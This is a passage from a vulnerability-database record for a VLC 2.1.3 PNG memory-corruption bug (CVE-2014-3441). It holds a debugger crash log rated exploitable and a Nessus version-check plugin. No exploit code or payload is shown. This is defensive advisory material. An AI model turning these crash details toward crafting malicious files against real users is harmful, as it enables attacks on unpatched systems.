\nModLoad: 6cbc0000 6cbcd000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libpva_plugin.dll \nModLoad: 65300000 6530c000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libxa_plugin.dll \nModLoad: 67500000 6750d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libaiff_plugin.dll \nModLoad: 6ce80000 6ce8d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libvoc_plugin.dll \nModLoad: 6fec0000 6fecc000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libau_plugin.dll \nModLoad: 6b500000 6b56d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libgme_plugin.dll \nModLoad: 65280000 6528d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\librawvid_plugin.dll \nModLoad: 6c940000 6c94e000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libimage_plugin.dll \nModLoad: 683c0000 6840f000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\codec\\libpng_plugin.dll \n(250.b14): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for \nC:\\WINDOWS\\system32\\msvcrt.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for \nC:\\Program Files\\VideoLAN\\VLC\\plugins\\codec\\libpng_plugin.dll - \neax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 \nedi=018e5000 \neip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe \nnc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00010206 \nmsvcrt!memset+0x41: \n77c47631 f3ab rep stos dword ptr es:[edi] \n0:009> .load winext/msec.dll \n0:009> !exploitable \n \n!exploitable 1.6.0.0 \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for \nC:\\Program Files\\VideoLAN\\VLC\\libvlccore.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for \nC:\\Program Files\\VideoLAN\\VLC\\plugins\\demux\\libimage_plugin.dll - \nExploitability Classification: EXPLOITABLE \nRecommended Bug Title: Exploitable - User Mode Write AV starting at \nmsvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419) \n \nUser mode write access violations that are not near NULL are exploitable. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126564/vlc213-corrupt.txt"}], "nessus": [{"lastseen": "2020-08-15T13:34:21", "description": "A denial of service (DoS) vulnerability exists in VLC media player. An unauthenticated, remote attacker can exploit \nthis issue, by tricking a user into opening a specially crafted .png file, to cause the application to stop responding.", "edition": 3, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-06-11T00:00:00", "title": "VLC < 2.1.4 DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3441"], "modified": "2020-06-11T00:00:00", "cpe": ["cpe:/a:videolan:vlc_media_player"], "id": "VLC_2_1_4.NASL", "href": "https://www.tenable.com/plugins/nessus/137358", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137358);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/14\");\n\n script_cve_id(\"CVE-2014-3441\");\n script_bugtraq_id(67315);\n\n script_name(english:\"VLC < 2.1.4 DoS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a media player that is affected by denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability exists in VLC media player. An unauthenticated, remote attacker can exploit \nthis issue, by tricking a user into opening a specially crafted .png file, to cause the application to stop responding.\");\n # https://packetstormsecurity.com/files/126564/VLC-Player-2.1.3-Memory-Corruption.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fba8d459\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VLC version 2.1.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-3441\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:videolan:vlc_media_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vlc_installed.nasl\");\n script_require_keys(\"SMB/VLC/Version\", \"installed_sw/VLC media player\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'VLC media player', win_local:TRUE);\n\nconstraints = [{'fixed_version':'2.1.4'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}]}
